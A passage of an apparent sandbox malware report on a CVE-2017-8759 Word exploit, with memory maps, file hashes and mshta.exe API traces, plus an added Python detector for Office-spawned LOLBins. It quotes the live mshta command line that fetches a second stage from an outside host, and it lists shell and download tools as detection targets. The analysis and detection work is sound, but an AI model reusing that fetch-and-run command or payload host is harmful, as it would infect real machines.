napinsp.dll 0x7fefafc0000 0x7fefafd4fff Memory Mapped File Readable, Writable, Executable False False False
dwmapi.dll 0x7fefb180000 0x7fefb197fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x7fefb560000 0x7fefb5b5fff Memory Mapped File Readable, Writable, Executable False False False
dhcpcsvc.dll 0x7fefbc30000 0x7fefbc47fff Memory Mapped File Readable, Writable, Executable False False False
dhcpcsvc6.dll 0x7fefbc50000 0x7fefbc60fff Memory Mapped File Readable, Writable, Executable False False False
fwpuclnt.dll 0x7fefbc80000 0x7fefbcd2fff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x7fefbdd0000 0x7fefbddafff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x7fefbde0000 0x7fefbe06fff Memory Mapped File Readable, Writable, Executable False False False
nlaapi.dll 0x7fefbf70000 0x7fefbf84fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x7fefc060000 0x7fefc253fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x7fefc740000 0x7fefc76cfff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x7fefc910000 0x7fefc91bfff Memory Mapped File Readable, Writable, Executable False False False
wshtcpip.dll 0x7fefc9e0000 0x7fefc9e6fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x7fefcd40000 0x7fefcd86fff Memory Mapped File Readable, Writable, Executable False False False
dnsapi.dll 0x7fefce60000 0x7fefcebafff Memory Mapped File Readable, Writable, Executable False False False
wship6.dll 0x7fefcfd0000 0x7fefcfd6fff Memory Mapped File Readable, Writable, Executable False False False
mswsock.dll 0x7fefcfe0000 0x7fefd034fff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x7fefd040000 0x7fefd056fff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x7fefd610000 0x7fefd634fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x7fefd640000 0x7fefd64efff Memory Mapped File Readable, Writable, Executable False False False
sxs.dll 0x7fefd650000 0x7fefd6e0fff Memory Mapped File Readable, Writable, Executable False False False
rpcrtremote.dll 0x7fefd730000 0x7fefd743fff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x7fefd750000 0x7fefd75efff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x7fefd7f0000 0x7fefd7fefff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x7fefd840000 0x7fefd9a6fff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x7fefd9d0000 0x7fefda3afff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x7fefdb40000 0x7fefdb6dfff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x7fefdd50000 0x7fefddeefff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x7fefde70000 0x7fefdf46fff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x7fefdf50000 0x7fefdf5dfff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x7fefdf60000 0x7fefe1b8fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x7fefe1c0000 0x7fefe3c2fff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x7fefe3d0000 0x7fefe547fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x7fefe550000 0x7fefe5e8fff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x7fefe5f0000 0x7fefe63cfff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x7fefe640000 0x7fefe76cfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x7fefe770000 0x7fefe7e0fff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x7fefe7f0000 0x7fefe841fff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x7fefe850000 0x7feff5d7fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x7feff5e0000 0x7feff709fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x7feff710000 0x7feff818fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x7feff8c0000 0x7feff8defff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x7feff8e0000 0x7feff9bafff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x7feff9c0000 0x7feff9c7fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x7feff9d0000 0x7feffa36fff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x7feffa40000 0x7feffb08fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x7feffb20000 0x7feffb20fff Memory Mapped File Readable, Writable, Executable False False False
private_0x000007fffffa6000 0x7fffffa6000 0x7fffffa7fff Private Memory Readable, Writable True False False
private_0x000007fffffa8000 0x7fffffa8000 0x7fffffa9fff Private Memory Readable, Writable True False False
private_0x000007fffffaa000 0x7fffffaa000 0x7fffffabfff Private Memory Readable, Writable True False False
private_0x000007fffffac000 0x7fffffac000 0x7fffffadfff Private Memory Readable, Writable True False False
private_0x000007fffffae000 0x7fffffae000 0x7fffffaffff Private Memory Readable, Writable True False False
pagefile_0x000007fffffb0000 0x7fffffb0000 0x7fffffd2fff Pagefile Backed Memory Readable True False False
private_0x000007fffffd4000 0x7fffffd4000 0x7fffffd5fff Private Memory Readable, Writable True False False
private_0x000007fffffd6000 0x7fffffd6000 0x7fffffd7fff Private Memory Readable, Writable True False False
private_0x000007fffffd8000 0x7fffffd8000 0x7fffffd8fff Private Memory Readable, Writable True False False
private_0x000007fffffda000 0x7fffffda000 0x7fffffdbfff Private Memory Readable, Writable True False False
private_0x000007fffffdc000 0x7fffffdc000 0x7fffffddfff Private Memory Readable, Writable True False False
private_0x000007fffffde000 0x7fffffde000 0x7fffffdffff Private Memory Readable, Writable True False False
For performance reasons, the remaining 23 entries are omitted.
The remaining entries can be found in flog.txt.
Modified Files
Filename c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\t[2].hta
File Size 3.24 KB (3313 bytes)
MD5 13b131d98fea2526196b20496ec68b0a
SHA1 1284d7400f30f5a2c409f3f53fcf34b30c32268d
SHA256 ae09b5dc38c85387a861cb4aee8b08ef6c7b216f21ba1bd06c9d1b3adab46a75
YARA Match False
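The process records above are the CVE-2017-8759 chain in the raw: cvtres.exe (PID 0xbb8) running under csc.exe (PID 0xba0) is the .NET SOAP WSDL parser compiling attacker-injected C# on the fly, and mshta.exe (PID 0xbc0) running under WINWORD.EXE (PID 0x9b0) with a remote URL on its command line is the hand-off to the second stage, which lands in the IE cache as t[2].hta. The detector below is an added example, not part of the VMRay report or its tooling: it walks a process snapshot and flags LOLBins whose ancestry leads back to an Office host, plus any mshta.exe launched with a remote URL. The records are taken from this page except the csc.exe entry, which is constructed: its command line is not shown here and its parent is assumed to be WINWORD.EXE, only its PID (0xba0) comes from the report. The check is written generally (any Office host, any of the listed binaries, any depth of nesting), so it goes beyond this single sample.

```python
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str      # lowercase image basename, e.g. "mshta.exe"
    cmdline: str


def image_name(path: str) -> str:
    """Normalise a full image path from the report to a lowercase basename."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def proc(pid: int, ppid: int, path: str, cmdline: str) -> Proc:
    return Proc(pid, ppid, image_name(path), cmdline)


OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Binaries a document-rendering process has no legitimate reason to spawn.
SUSPICIOUS_CHILDREN = {
    "csc.exe", "cvtres.exe", "mshta.exe", "powershell.exe", "cmd.exe",
    "wscript.exe", "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
}
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
MAX_DEPTH = 16  # bound the ancestry walk: PIDs are reused and snapshots can be inconsistent


def ancestry(p: Proc, by_pid: Dict[int, Proc]) -> List[Proc]:
    """[p, parent, grandparent, ...] as far as the snapshot allows, cycle-safe."""
    chain, seen, cur = [p], {p.pid}, p
    while cur.ppid in by_pid and cur.ppid not in seen and len(chain) < MAX_DEPTH:
        cur = by_pid[cur.ppid]
        seen.add(cur.pid)
        chain.append(cur)
    return chain


def find_suspicious(procs: List[Proc]) -> List[dict]:
    """Flag LOLBins that descend from an Office host, and mshta.exe given a remote URL."""
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        chain = ancestry(p, by_pid)
        office = next((a for a in chain[1:] if a.image in OFFICE_HOSTS), None)
        reasons = []
        if office is not None and p.image in SUSPICIOUS_CHILDREN:
            reasons.append(f"{p.image} descends from {office.image}")
        if p.image == "mshta.exe" and REMOTE_URL.search(p.cmdline):
            reasons.append("mshta.exe launched with a remote URL")
        if reasons:
            findings.append({"pid": p.pid,
                             "chain": " <- ".join(a.image for a in chain),
                             "reasons": reasons})
    return findings


# Process records from this report. The csc.exe record is constructed: its
# command line is not shown on this page and its parent is assumed to be
# WINWORD.EXE (PID 0x9b0); only its PID (0xba0) comes from the report.
# WINWORD's own parent is irrelevant to the check and is set to 0.
REPORT_PROCS = [
    proc(0x9b0, 0, r"c:\program files\microsoft office\root\office16\winword.exe",
         r'"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"'),
    proc(0xba0, 0x9b0, r"c:\windows\microsoft.net\framework64\v2.0.50727\csc.exe", ""),
    proc(0xbb8, 0xba0, r"c:\windows\microsoft.net\framework64\v2.0.50727\cvtres.exe",
         r'C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY '
         r'/MACHINE:IX86 "/OUT:C:\Users\aETAdzjz\AppData\Local\Temp\RESEDB9.tmp" '
         r'"c:\Users\aETAdzjz\Desktop\CSCED98.tmp"'),
    proc(0xbc0, 0x9b0, r"c:\windows\system32\mshta.exe",
         r'"C:\Windows\System32\mshta.exe" http://www.samyrai777m.p-host.in/t/t.php?thread=0'),
]

if __name__ == "__main__":
    for f in find_suspicious(REPORT_PROCS):
        print(f"PID {f['pid']:#x}: {f['chain']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

Run against the records above it reports csc.exe, cvtres.exe (two levels below WINWORD, which a parent-only rule would miss) and mshta.exe, the last with both reasons. On a live host the same logic applies to Sysmon event ID 1 or EDR process-creation telemetry; the ancestry walk is bounded and cycle-safe because PID reuse in a long-running snapshot can otherwise make it loop.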
Threads
Thread 0xbc4
(Host: 327, Network: 0)
Category Operation Information Success Count
System Get Time type = System Time, time = 2017-10-24 17:37:59 (UTC) True 1
System Get Time type = Ticks, time = 127203 True 1
Module Get Handle module_name = c:\windows\system32\mshta.exe, base_address = 0xff9d0000 True 1
System Get Info type = Operating System False 1
File Open filename = STD_INPUT_HANDLE True 1
File Open filename = STD_OUTPUT_HANDLE True 1
File Open filename = STD_ERROR_HANDLE True 1
Environment Get Environment String - True 1
Module Get Filename process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 True 1
System Get Info type = Operating System True 1
Module Get Handle module_name = c:\windows\system32\kernel32.dll, base_address = 0x776e0000 True 1
Module Get Address module_name = c:\windows\system32\kernel32.dll, function = HeapSetInformation, address_out = 0x776fc4a0 True 1
Registry Open Key reg_name = HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 True 1
Registry Read Value reg_name = HKEY_CLASSES_ROOT\clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32, data = C:\Windows\System32\mshtml.dll, type = REG_SZ True 1
Module Load module_name = C:\Windows\System32\mshtml.dll, base_address = 0x7fee0880000 True 1
System Get Time type = System Time, time = 2017-10-24 17:37:59 (UTC) True 1
System Get Time type = Ticks, time = 127546 True 1
System Get Info type = Operating System False 1
Module Get Filename process_name = c:\windows\system32\mshta.exe, file_name_orig = C:\Windows\System32\mshta.exe, size = 260 True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS True 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING False 1
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING